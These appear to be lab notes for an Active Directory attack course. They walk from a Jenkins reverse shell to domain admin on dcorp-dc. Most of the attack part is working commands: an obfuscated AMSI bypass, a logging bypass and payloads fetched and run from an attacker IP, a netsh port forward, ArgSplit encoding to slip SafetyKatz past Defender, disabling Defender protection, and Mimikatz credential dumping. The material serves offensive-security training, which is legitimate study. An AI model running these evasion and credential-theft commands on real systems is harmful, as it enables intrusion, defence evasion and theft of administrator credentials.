# Evasion ### Lab 7 Scenario: * Attack Path 1: * Student -> dcorp-ci via Jenkins * dcorp-ci is local admin on -> dcorp-mgmt * Using local admin privileges on dcorp-mgmt, we extracted domain admin credentials and use them to access dcorp-dc from Student. * Attack Path 2 (Derivative Local Admin or shortest path to DA): * Student has local admin privilges on dcorp-adminsrv. * To extract credentials, we evaded AppLocker. * dcorp-adminsrv has derivative local admin privileges on dcorp-mgmt. * We extracted domain admin credentials from dcorp-mgmt and used to access dcorp-dc from Student. * Student machine (student372) has exploited Jenkins to get a reverse shell on "dcorp\ciadmin" * From dcorp\ciadmin, we disable SB Logging to run AMSI bypass script. This is done to avoid PowerView detection. * We transfer PowerView to ciadmin to check domain sessions using `Find-DomainUserLocation`and find that there is a domain admin session on dcorp-mgmt server. * We can abuse this using WinRS or PSRemoting. * **Abuse using WinRS** * We first check if we can execute commands on dcorp-mgmt and if WinRM port is open. * Since we can run commands, we want to run SafetyKatz.exe on dcorp-mgmt. * We want SafetyKatz.exe to run on memory without touching disk. For this, we download NetLoader and use xcopy (since we have admin on ciadmin) to copy Loader to dcorp-mgmt. * We also want to avoid detection on dcorp-mgmt by calling remote IP to download SafeteKatz. So instead of directly calling attacker IP, we port forward localhost to attacker IP. * Since Defender would detect SafetyKatz even with NetLoader, we encode arguments using ArgSplit.bat, copy the output to Safety.bat which runs SafetyKatz.exe through loader with the encoded Arguments. * We download the Safety.bat on ciadmin and xcopy it to dcorp-mgmt. * Finally, we use WinRS to run Safety.bat which uses Loader.exe to download and execute SafetyKatz.exe in-memory on dcorp-mgmt. * We get credentials of svcadmin - a domain administrator. * **Abuse using PSRemoting** * Check if we can execute commands on dcorp-mgmt using PSRemoting * Download InvokeMimi.ps1 on dcorp-mgmt to dump hashes. * Disable AMSI either using the conventional method or using Set-MpPreference (since we have admin access on dcorp-mgmt. * After disabling, we run Invoke-command to call the Invoke-Mimi on the session objected we created while disabling AMSI. * We finally get the hashes. * **Using Over-Pass-The-Hash** * We can use O-PTH to use svcadmin's credentials. * From an elevated shell, we can use Rubeus, SafetyKatz, Invoke-Mimi to get a process from hash we obtained earlier as domain controller. * **Derivative Local Admin** * We are trying to find the machines on which student372 has admin privileges using Find-PSRemotingLocalAdminAccess * We find student372 has local admin access to dcorp-adminsrv. We use Enter-PSSession to get a shell on dcorp-adminsrv as student372. * When we try to turn of script logging or bypass AMSI, it does not work because PSRemoting uses Constrained Language Mode (CLM). * We can check this using `$ExecutionContext.SessionState.LanguageMode` * This is either because of AppLocker of WDAC (Windows Defender Application Control). Both of these are application allow listing solutions from Microsoft. We can check AppLocker Policy using: `Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections` cc * We find that everyone can run scripts from Program Files directory. * We can disable Defender and run any script in ProgramFiles. * We cannot use dot sourcing because of CLM, so we use Invoke-MimiEx.ps1 which adds "Invoke-Mimi -Command sekurlsa::ekeys" at the end of the Invoke-Mimi.ps1 file. * From student machine, we copy Invoke-MimiEx.ps1 to dcorp-adminsrv's ProgramFiles. ## AMSI Bypass First disable Enhanced Script Block Logging so that AMSI is not logged. ``` iex (iwr http://172.16.100.72/sbloggingbypass.txt -UseBasicParsing) ``` Then run the below command to bypass AMSI {% code overflow="wrap" %} ```powershell S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) ``` {% endcode %} ## NetLoader Download and xcopy. {% code overflow="wrap" %} ```powershell iwr http://172.16.100.72/Loader.exe -OutFile C:\Users\Public\Loader.exe echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe ``` {% endcode %} ## Port Forward Localhost:80 to Attacker Machine {% code overflow="wrap" %} ```powershell $null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72" ``` {% endcode %} ## Running SafetyKatz.bat ### Use Loader without Encoding {% code overflow="wrap" %} ```powershell iwr http://172.16.100.72/Loader.exe -OutFile C:\Users\Public\Loader.exe $null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit ``` {% endcode %} ### Use Loader after Encoding (Safety.bat) Encode SafetyKatz arguments using **Argsplit.bat** ``` C:\AD\Tools>ArgSplit.bat [!] Argument Limit: 180 characters [+] Enter a string: sekurlsa::ekeys set "z=s" set "y=y" set "x=e" set "w=k" set "v=e" set "u=:" set "t=:" set "s=a" set "r=s" set "q=l" set "p=r" set "o=u" set "n=k" set "m=e" set "l=s" set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%" ``` Include Argsplit output in **Safety.bat** ``` @echo off set "z=s" set "y=y" set "x=e" set "w=k" set "v=e" set "u=:" set "t=:" set "s=a" set "r=s" set "q=l" set "p=r" set "o=u" set "n=k" set "m=e" set "l=s" set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%" echo %Pwn% C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -Args %Pwn% exit" ``` ### Download & Execute SafetyKatz.exe in-memory {% code overflow="wrap" %} ```powershell iwr http://172.16.100.72/Safety.bat -OutFile C:\Users\Public\Safety.bat echo F | xcopy C:\Users\Public\Safety.bat \\dcorp-mgmt\C$\Users\Public\Safety.bat $null | winrs -r:dcorp-mgmt "cmd /c C:\Users\Public\Safety.bat" ``` {% endcode %} ## PowerShell Remoting Check if we can run cmds on dcorp-mgmt using PSRemoting {% code overflow="wrap" %} ```powershell Invoke-Command -ScriptBlock {$env:username;$env:computername} -ComputerName dcorp-mgmt ``` {% endcode %} Use Invoke-Mimi to dump hashes of domain admin svcadmin: {% code overflow="wrap" %} ```powershell iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing) ``` {% endcode %} ### Disable AMSI using Set-MpPreference ```powershell $sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess ``` Run Invoke-Mimi and get hashes ```powershell Invoke-command -ScriptBlock ${function:Invoke-Mimi} -Session $sess ```